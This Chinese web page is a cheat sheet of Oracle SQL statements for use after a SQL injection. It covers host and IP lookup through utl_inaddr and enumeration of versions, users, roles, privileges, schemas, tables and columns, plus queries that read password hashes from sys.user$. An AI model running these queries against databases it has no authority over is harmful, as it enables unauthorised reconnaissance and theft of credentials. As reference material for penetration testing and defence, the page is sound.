Oracle SQL注入常用语句

解析IP select utl_inaddr.get_host_address('google.com') from dual;

获取本机IP地址 select utl_inaddr.get_host_address from dual;

根据IP地址反向解析主机名 select utl_inaddr.get_host_name('10.80.18.241') from dual;

-- list version select banner from v$version where rownum=1 ; -- oracle version

-- list user select user from dual; -- current user select username from user_users; -- current user select username from all_users; -- all user,the current user can see... select username from dba_users; -- all user,need pris

-- list role select role from session_roles; -- current role

-- list privs select privilege from user_sys_privs; -- privs the current user has select privilege from role_sys_privs; -- privs the current role has select privilege from session_privs; -- the all privs that current user has = user_sys_privs + role_sys_privs select * from dba_sys_privs; -- all user's privs,need privs

-- list password hash select name,password,astatus from sys.user$; -- password hash <=10g,need privs select name,spare4 from sys.user$; -- password has 11g,need privs

-- list database select global_name from global_name; -- current database select sys.database_name from dual; -- current database select name from v$database; -- current database name,need privs select instance_name from v$instance; -- current database name,need privs

-- list schemas select distinct owner from all_tables; -- all schema

-- list tables select table_name from all_tables where owner='xxx'; -- all table name

-- list columns select owner,table_name,column_name from all_tab_columns where table_name='xxx'; select owner,column_name from all_tab_cols where table_name='xxx';

（编辑：李大同）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!